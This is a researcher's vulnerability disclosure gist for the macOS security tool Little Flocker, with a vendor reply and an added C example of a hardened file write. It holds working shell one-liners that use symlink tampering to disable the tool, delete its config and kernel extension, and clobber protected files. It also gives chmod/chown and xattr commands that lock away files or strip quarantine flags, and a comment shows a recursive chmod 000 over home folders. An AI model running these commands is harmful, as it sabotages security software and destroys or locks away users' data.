@pwnsdx

pwnsdx/ff.sh

Last active Aug 17, 2016
Multiple bugs in Little Flocker (previously named FlockFlock) (<=0.0.41)
# Description: FlockFlock's daemon does not protect flockflock_temp.png from tampering
# Impact: An attacker can use this entry point to do various things like disabling FlockFlock,
# preventing the app icon from showing and even creating or deleting files by replacing
# them with a fancy icon!
# Severity: Very High
# Info: && echo "" > /Users/sabri/.t; is just here to trigger a popup and is not required
# (except for "Disable FlockFlock by deleting default config and user config .flockflockrc
# file").

# Disable the app icon in popups by redirecting flockflock_temp to /dev/null
ln -fs /dev/null /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.t;
# Delete (and create) a file in protected areas
ln -fs /Users/sabri/Desktop/somerandomfile.txt /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.t;
# Disable FlockFlock by deleting default config and user config .flockflockrc file
ln -fs /Library/Application\ Support/FlockFlock/.flockflockrc /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.t; ln -fs /Users/sabri/.flockflockrc /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.b
# Disable FlockFlock by deleting the kext
ln -fs /Library/Extensions/FlockFlock.kext/Contents/MacOS/FlockFlock /private/tmp/flockflock_temp.png && echo "" > /Users/sabri/.t;

# Description: FlockFlock does not prevent protected areas from being chmod'ed/chown'ed
# Impact: An attacker could affect the availability of a file. In a scenario where an advanced
# ransomware cannot delete files, it could simply prevent access to them and make the user
# believe their files have been encrypted.
# Severity: Medium

# Prevent access to files in protected areas
chmod 000 /Users/sabri/Desktop/blahblah.txt
# Or by using chown
chown nobody:nogroup /Users/sabri/Desktop/somerandomfile.txt

# Description: Attributes and extended attributes are not protected by FlockFlock
# Impact: An attacker can read, modify and delete the (extended) attributes of a file and therefore affect its integrity
# Severity: Low

# Modify creation/modified/accessed date of a file
touch -t 199912312359 /Users/sabri/Desktop/blahblah.txt
# Access metadata of a file
xattr -v /Users/sabri/Downloads/FlockFlock-0.0.39a.pkg
xattr -psl com.apple.quarantine /Users/sabri/Downloads/FlockFlock-0.0.39a.pkg
# Remove quarantine flags of a file in a protected area
xattr -d com.apple.quarantine /Users/sabri/Downloads/FlockFlock-0.0.39a.pkg
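The root cause of the first bug is a daemon writing to a fixed, world-writable path that an unprivileged user can pre-create as a symlink. The following added example (not code from the gist or from Little Flocker) contrasts the naive write with a hardened one that uses O_EXCL and O_NOFOLLOW; the scenario is constructed in a private temporary directory and the file names are placeholders.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Naive pattern (the behaviour the gist abuses): fopen("w") on a fixed,
 * world-writable path follows a symlink and truncates whatever it targets. */
static int naive_write(const char *path, const char *data) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(data, f);
    return fclose(f) == 0 ? 0 : -1;
}

/* Hardened pattern: O_EXCL rejects any pre-existing path (a planted symlink is
 * reported as EEXIST), O_NOFOLLOW refuses links, and mode 0600 keeps it private. */
static int hardened_write(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;               /* errno is EEXIST or ELOOP when tampered */
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Constructed scenario in a private temp dir: "victim" stands in for a file in a
 * protected area, "flockflock_temp.png" is a symlink pointing at it. Returns 1 when
 * the naive write clobbers the victim and the hardened write refuses, else 0. */
int symlink_demo(void) {
    char dir[] = "/tmp/ffdemo.XXXXXX", victim[64], link[64], buf[16] = {0};
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/flockflock_temp.png", dir);
    if (naive_write(victim, "original") != 0 || symlink(victim, link) != 0) return 0;
    int naive_rc = naive_write(link, "x");     /* follows the link: victim becomes "x" */
    int hard_rc = hardened_write(link, "x");   /* rejected before any write happens */
    int hard_errno = errno;
    FILE *f = fopen(victim, "r");
    if (f) { fread(buf, 1, sizeof buf - 1, f); fclose(f); }
    unlink(link); unlink(victim); rmdir(dir);
    return naive_rc == 0 && strcmp(buf, "x") == 0 && hard_rc == -1 &&
           (hard_errno == EEXIST || hard_errno == ELOOP);
}

int main(void) {
    puts(symlink_demo() ? "naive write clobbered the victim; hardened write refused" : "demo failed");
    return 0;
}
```

A daemon that must hand a file to another process should additionally create it inside a directory it owns (mkdtemp) rather than directly under /tmp, so no other user can pre-create the name at all.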
@ghost ghost commented Aug 17, 2016

Hello,

The symlink bug you describe was already fixed in 0.0.42a, please give that a run.
The chmod issue you described is outside of the scope of Little Flocker, we do not care if something wants to chmod a file.
The file creation issue you described is an intentional part of Little Flocker's feature set; we not only allow applications to create files, but actively track those files to allow the same application to later modify or delete them, to avoid breaking applications that need this functionality, and without bothering the user.
The xattr issue you described is an interesting one, and we will add support for modifying attrs in future versions.

@pwnsdx pwnsdx commented Aug 17, 2016

> The symlink bug you describe was already fixed in 0.0.42a, please give that a run.

Sh**! I wanted to be first! 💩

> The chmod issue you described is outside of the scope of Little Flocker, we do not care if something wants to chmod a file.

In protected areas? A `sudo chmod -R 000 ~/Desktop ~/Documents ~/Pictures ~/Downloads ~/Movies ~/Public` by malware can be ugly, especially for novice users.

> The xattr issue you described is an interesting one, and will add support for modifying attrs in future versions

Cool then!

cc @jzdziarski
